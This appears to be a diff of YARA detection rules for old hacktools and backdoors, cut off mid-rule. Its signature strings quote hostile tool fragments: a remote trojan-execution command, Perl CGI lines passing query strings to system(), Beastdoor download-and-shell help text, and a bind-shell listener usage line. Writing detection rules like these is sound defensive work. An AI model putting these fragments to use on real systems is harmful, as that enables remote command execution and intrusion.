 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
-		logic_hash = "f334a59c2d95505807df642a8d5605b1b7d8b3385a552e8f5a37f344d7a75412"
-		score = 60
-		quality = 35
+		hash = "c1937a86939d4d12d10fc44b7ab9ab27"
+		logic_hash = "0ee2ffc5ed243d170b8013b3a164a3719f43bd473f4af7e1a2697d88a298fe9f"
+		score = 75
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "RangeScan.EXE" fullword wide
-		$s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii
-		$s9 = "Produced by isn0" fullword ascii
-		$s10 = "RangeScan" fullword wide
-		$s20 = "%d-%d-%d %d:%d:%d" fullword ascii
+		$s0 = "Corrupt Data!"
+		$s1 = "K4p~omkIz"
+		$s2 = "DllTrojanScan"
+		$s3 = "GetDllInfo"
+		$s4 = "Compressed by Petite (c)1999 Ian Luck."
+		$s5 = "GetFileCRC32"
+		$s6 = "GetTrojanNumber"
+		$s7 = "TFAKAbout"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Xyzcmd_Zip_Folder_Readme
+rule SIGNATURE_BASE_Stealthwasp_S_Basic_Portscanner_V1_2
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Readme.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cee0f8c3-f947-50a5-ae8c-4ce83ef5e433"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "7f706186-f2e2-5d4d-951a-2ec8fc757cec"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2103-L2117"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L391-L402"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
-		logic_hash = "38d69eee78ff8fa2ad064871481bd1b8a926146922952c7e199d27c809d0c980"
-		score = 60
+		hash = "7c0f2cab134534cd35964fe4c6a1ff00"
+		logic_hash = "b01c165b5e5be3ba6905e8bc44a14c3d7195effd058e4c0c31678777d19db8b5"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
-		$s20 = "XYZCmd V1.0" fullword ascii
+		$s1 = "Basic PortScanner"
+		$s6 = "Now scanning port:"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Bypassfirewall_Zip_Folder_Inject
+rule SIGNATURE_BASE_Bluesportscan
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Inject.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bb31dc53-f3c1-5f8b-84f9-c231a4e1675b"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file BluesPortScan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "4bcb8b7c-5e22-5496-9a29-66e85e3c3395"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2119-L2134"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L404-L415"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
-		logic_hash = "6350e11097bc2bb8fb0fbecf6be463aeaf39ad4169d2dd06a57577bf02b515f8"
-		score = 60
+		hash = "6292f5fc737511f91af5e35643fc9eef"
+		logic_hash = "5cb4e4b87eaf166c85d23114f5abc10ef83b4a29968bf6fef4b3fce7ff2787fd"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "Fail To Inject" fullword ascii
-		$s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii
-		$s11 = " Successfully" fullword ascii
+		$s0 = "This program was made by Volker Voss"
+		$s1 = "JiBOo~SSB"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Sqlcmd
+rule SIGNATURE_BASE_Scanarator_Iis
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0efdfac7-5a89-5251-b583-12b0a58c48ff"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file iis.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "a467147b-53c8-53db-aa33-5f0e4e066988"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2136-L2155"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L417-L428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
-		logic_hash = "1e41c38da7552d6a25c918547a39ed07ec38a537fd04e2090d1199c4fb0e3b1e"
-		score = 40
+		hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
+		logic_hash = "092cb902e10624b207b7932e6b3c1fe2277ed1d183e5de9ee4d07d8548e90ab6"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Permission denial to EXEC command.:(" ascii
-		$s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii
-		$s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii
-		$s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii
-		$s6 = "SqlCmd2.exe Inside Edition." fullword ascii
-		$s7 = "Http://www.patching.net  2000/12/14" fullword ascii
-		$s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii
+		$s0 = "example: iis 10.10.10.10"
+		$s1 = "send error"
 
 	condition:
-		4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Aspack_ASPACK
+rule SIGNATURE_BASE_Stealth_Stealth
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ca9a25f9-a94b-5e10-b935-c6e2d38d999c"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file Stealth.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "5f45882e-3e27-596d-8725-fad380e1c297"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2157-L2172"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L430-L441"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
-		logic_hash = "1c7abc0a126ee8c8b20e55ad85974067f1a230efc5f95a1a1e732025e39d5bab"
-		score = 60
+		hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
+		logic_hash = "e210b1a553549c22f66511dfc9d0d3f5b17f02981b9e9915827bc909f34b3262"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "ASPACK.EXE" fullword wide
-		$s5 = "CLOSEDFOLDER" fullword wide
-		$s10 = "ASPack compressor" fullword wide
+		$s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
+		$s6 = "This tool may be used only by system administrators. I am not responsible for "
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_2323
+rule SIGNATURE_BASE_Angry_IP_Scanner_V2_08_Ipscan
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file 2323.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "445f6a49-51e6-5eb8-ae08-e5989aafb6c4"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file ipscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "5fbcbb95-6cd4-5587-bf44-5b5ed133ce5e"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2174-L2192"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L443-L455"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
-		logic_hash = "1278c53f64a0ba7f3f6a728237eac6808b260ad36551923276bfba9b36586870"
-		score = 60
+		hash = "70cf2c09776a29c3e837cb79d291514a"
+		logic_hash = "1b50856ad35c146a684298a86f1629c45996ab08ffae8486a388805262ec2367"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "port - Port to listen on, defaults to 2323" fullword ascii
-		$s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii
-		$s3 = "Failed to execute shell" fullword ascii
-		$s5 = "/h   - Hide Window" fullword ascii
-		$s7 = "Accepted connection from client at %s" fullword ascii
-		$s9 = "Error %d: %s" fullword ascii
+		$s0 = "_H/EnumDisplay/"
+		$s5 = "ECTED.MSVCRT0x"
+		$s8 = "NotSupported7"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Jc_ALL_Wineggdropshell_Rar_Folder_Install_2
+rule SIGNATURE_BASE_Crack_Loader
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Install.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ebfc8e53-328c-5deb-bf9b-e0270f171c68"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file Loader.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "0c4c7b69-7739-5c1b-8c7c-4aaa724e4455"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2194-L2212"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L457-L468"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "95866e917f699ee74d4735300568640ea1a05afd"
-		logic_hash = "9c12e8491918a656e37b4ee6c3a42ec970cb6cf101ca5fe3fdfe9eab16526219"
-		score = 60
+		hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
+		logic_hash = "3380ace7c34c15dfd9a9625c8c4a1ed7e35c1cf3c2eca9b1e00dd0092d256150"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://go.163.com/sdemo" fullword wide
-		$s2 = "Player.tmp" fullword ascii
-		$s3 = "Player.EXE" fullword wide
-		$s4 = "mailto:sdemo@263.net" fullword ascii
-		$s5 = "S-Player.exe" fullword ascii
-		$s9 = "http://www.BaiXue.net (" wide
+		$s0 = "NeoWait.exe"
+		$s1 = "RRRRRRRW"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_TFTPD32
+rule SIGNATURE_BASE_CN_GUI_Scanner
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
+		description = "Detects an unknown GUI scanner tool - CN background"
 		author = "Florian Roth (Nextron Systems)"
-		id = "071fba15-affe-539a-bcc0-c14943fff51a"
-		date = "2014-11-23"
+		id = "ca88d4d3-5d18-5856-874f-e50deceef54f"
+		date = "2014-04-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2214-L2235"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L470-L487"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
-		logic_hash = "cbf239330f8f1fd8be3ef3c93571c723447ca3b814fb7c1eff5ea4b2e7f5364f"
-		score = 60
+		hash = "3c67bbb1911cdaef5e675c56145e1112"
+		logic_hash = "f9281277ad7058527699d1f5037bb78be1363c90f38e2e399592c58f0b313bd7"
+		score = 65
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = " http://arm.533.net" fullword ascii
-		$s1 = "Tftpd32.hlp" fullword ascii
-		$s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii
-		$s3 = "TFTPD32 -- " fullword wide
-		$s4 = "%d -- %s" fullword ascii
-		$s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii
-		$s12 = "TftpPort" fullword ascii
-		$s13 = "Ttftpd32BackGround" fullword ascii
-		$s17 = "SOFTWARE\\TFTPD32" fullword ascii
+		$s1 = "good.txt" fullword ascii
+		$s2 = "IP.txt" fullword ascii
+		$s3 = "xiaoyuer" fullword ascii
+		$s0w = "ssh(" wide
+		$s1w = ").exe" fullword wide
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Iecv
+rule SIGNATURE_BASE_CN_Packed_Scanner : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file iecv.exe"
+		description = "Suspiciously packed executable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08126db3-267b-5289-b562-40bc264f6e3e"
-		date = "2014-11-23"
+		id = "a11c4ee6-7244-5601-af26-a45f9fdc8e1b"
+		date = "2014-06-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2237-L2254"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L489-L505"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6e6e75350a33f799039e7a024722cde463328b6d"
-		logic_hash = "e2985d85030d88cb63eb8b80673812f85aea6e11c6aeb430387cdb8886958b6a"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
+		logic_hash = "0d9178ec65029e4ce8d4c3cc28ebd041c612f3a48f095b60c7a4515de03cccf4"
+		score = 40
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Edit The Content Of Cookie " fullword wide
-		$s3 = "Accessories\\wordpad.exe" fullword ascii
-		$s4 = "gorillanation.com" fullword ascii
-		$s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
-		$s12 = "http://nirsoft.cjb.net" fullword ascii
+		$s1 = "kernel32.dll" fullword ascii
+		$s2 = "CRTDLL.DLL" fullword ascii
+		$s3 = "__GetMainArgs" fullword ascii
+		$s4 = "WS2_32.DLL" fullword ascii
 
 	condition:
-		all of them
+		all of them and filesize < 180KB and filesize > 70KB
 }
-rule SIGNATURE_BASE_Antiy_Ports_1_21
+rule SIGNATURE_BASE_Tiny_Network_Tool_Generic : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
+		description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb53fc91-4dec-5416-a2c7-1e8256297886"
-		date = "2014-11-23"
+		id = "04b1c2c6-605c-52d5-aa07-f3b77a6c4593"
+		date = "2014-08-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2256-L2271"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L507-L539"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
-		logic_hash = "fb175c413faf0ca33cf166029b217aac31126d6cabc81883c16b2de2ab00c16c"
-		score = 60
+		logic_hash = "efd04ee3a7bb120cdff00369e1856dd03ec9db84e1fb3196bf5e1a8ebd302802"
+		score = 40
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
+		hash1 = "cafc31d39c1e4721af3ba519759884b9"
+		hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
 
 	strings:
-		$s0 = "AntiyPorts.EXE" fullword wide
-		$s7 = "AntiyPorts MFC Application" fullword wide
-		$s20 = " @Stego:" fullword ascii
+		$s0 = "KERNEL32.DLL" fullword ascii
+		$s1 = "CRTDLL.DLL" fullword ascii
+		$s3 = "LoadLibraryA" fullword ascii
+		$s4 = "GetProcAddress" fullword ascii
+		$y1 = "WININET.DLL" fullword ascii
+		$y2 = "atoi" fullword ascii
+		$x1 = "ADVAPI32.DLL" fullword ascii
+		$x2 = "USER32.DLL" fullword ascii
+		$x3 = "wsock32.dll" fullword ascii
+		$x4 = "FreeSid" fullword ascii
+		$x5 = "atoi" fullword ascii
+		$z1 = "ADVAPI32.DLL" fullword ascii
+		$z2 = "USER32.DLL" fullword ascii
+		$z3 = "FreeSid" fullword ascii
+		$z4 = "ToAscii" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and ( all of ( $y* ) or all of ( $x* ) or all of ( $z* ) ) and filesize < 15KB
 }
-rule SIGNATURE_BASE_Perlcmd_Zip_Folder_Cmd
+rule SIGNATURE_BASE_Beastdoor_Backdoor
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
+		description = "Detects the backdoor Beastdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "19e4eca0-bd56-57af-afd2-ee2fc5c7c0df"
-		date = "2014-11-23"
+		id = "64f67233-6677-53c8-b212-f1a425f78803"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2273-L2293"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L541-L561"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
-		logic_hash = "4391207d66b7ed5ac2db127d3efcf22f8c2bbd0ee1f0c6982d656b91e5e10c8f"
-		score = 60
+		hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
+		logic_hash = "35aa5d66c0fd4bf1995fc23a68283e8a28f31b5a1e1f3b742dd0ab89c48bf403"
+		score = 55
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii
-		$s1 = "s/%20/ /ig;" fullword ascii
-		$s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii
-		$s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii
-		$s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii
-		$s6 = "$execthis = $_;" fullword ascii
-		$s7 = "system($execthis);" fullword ascii
-		$s12 = "s/%2f/\\//ig;" fullword ascii
+		$s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" fullword
+		$s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword
+		$s2 = "http://IP/a.exe a.exe            -->Download A File" fullword
+		$s7 = "Host: wwp.mirabilis.com:80" fullword
+		$s8 = "%s -Set Port PortNumber              -->Set The Service Port" fullword
+		$s11 = "Shell                            -->Get A Shell" fullword
+		$s14 = "DeleteService ServiceName        -->Delete A Service" fullword
+		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword
+		$s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" fullword
 
 	condition:
-		6 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Aspbackdoor_Asp3
+rule SIGNATURE_BASE_Powershell_Netcat
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file asp3.txt"
+		description = "Detects a Powershell version of the Netcat network hacking tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ed86e829-449b-5088-a105-f1fe79547540"
-		date = "2014-11-23"
+		id = "e4b018c0-3214-5102-93b1-6a048324f9dd"
+		date = "2014-10-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2295-L2315"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L563-L577"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
-		logic_hash = "c62ae1d32e93a8614a8288ce2df8e26806ab67b3b133067182f0396f0f080b78"
+		logic_hash = "ff9d7c3e83fd27620559306c07556ce7afd1ba7a5db5f5c21ad0841d58b85014"
 		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii
-		$s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii
-		$s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii
-		$s14 = " Windows NT " fullword ascii
-		$s16 = " WIndows 2000 " fullword ascii
-		$s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii
-		$s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii
-		$s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii
+		$s0 = "[ValidateRange(1, 65535)]" fullword
+		$s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
+		$s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Fpipe
+rule SIGNATURE_BASE_Chinese_Hacktool_1014
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
+		description = "Detects a chinese hacktool with unknown use"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0b2f11d9-a919-5790-8724-d2f028e4fa3a"
-		date = "2014-11-23"
+		id = "e5db5f58-a1fd-51e0-9037-337fcca71f11"
+		date = "2014-10-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2317-L2335"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L579-L596"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
-		logic_hash = "ecf143c231aeb37cf9575c3ea8db83c9a049e85a7c95668deeac0878f9c30b9c"
+		hash = "98c07a62f7f0842bcdbf941170f34990"
+		logic_hash = "ffb1f653fd536a46dae4bf2c91c3c0582b703b8f0d33838b9736083e307a8e79"
 		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
-		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
-		$s2 = "source port for that outbound connection being set to 53 also." fullword ascii
-		$s3 = " -s    - outbound source port number" fullword ascii
-		$s5 = "http://www.foundstone.com" fullword ascii
-		$s20 = "Attempting to connect to %s port %d" fullword ascii
+		$s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide
+		$s1 = "msctls_progress32" fullword wide
+		$s2 = "Reply-To: %s" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s4 = "html htm htx asp" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Concon
+rule SIGNATURE_BASE_CN_Hacktool_BAT_Portsopen
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file concon.com"
+		description = "Detects a chinese BAT hacktool for local port evaluation"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca7862cc-1053-5fce-a569-6ecc069314df"
-		date = "2014-11-23"
+		id = "55c3f678-ba70-5a4a-b288-9d0953eff968"
+		date = "2014-12-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2337-L2350"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L598-L612"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
-		logic_hash = "c45955cc59970657f8787ddc0e549939d2fa30d11cfd19fd12cd9067abb3bcd6"
+		logic_hash = "e5bc7b3264d7fc63fcc6c3d7e45859eb83b8ce60bd9a918f5eff887f626d09a3"
 		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii
+		$s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
+		$s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
+		$s2 = "@echo off" ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Aspbackdoor_Regdll
+rule SIGNATURE_BASE_CN_Hacktool_Ssport_Portscanner
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file regdll.asp"
+		description = "Detects a chinese Portscanner named SSPort"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37096c50-68d0-5412-847a-022062a5ff2a"
-		date = "2014-11-23"
+		id = "38cc8830-efd3-51b7-8ac6-c9bf468212cb"
+		date = "2014-12-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2352-L2368"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L614-L628"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
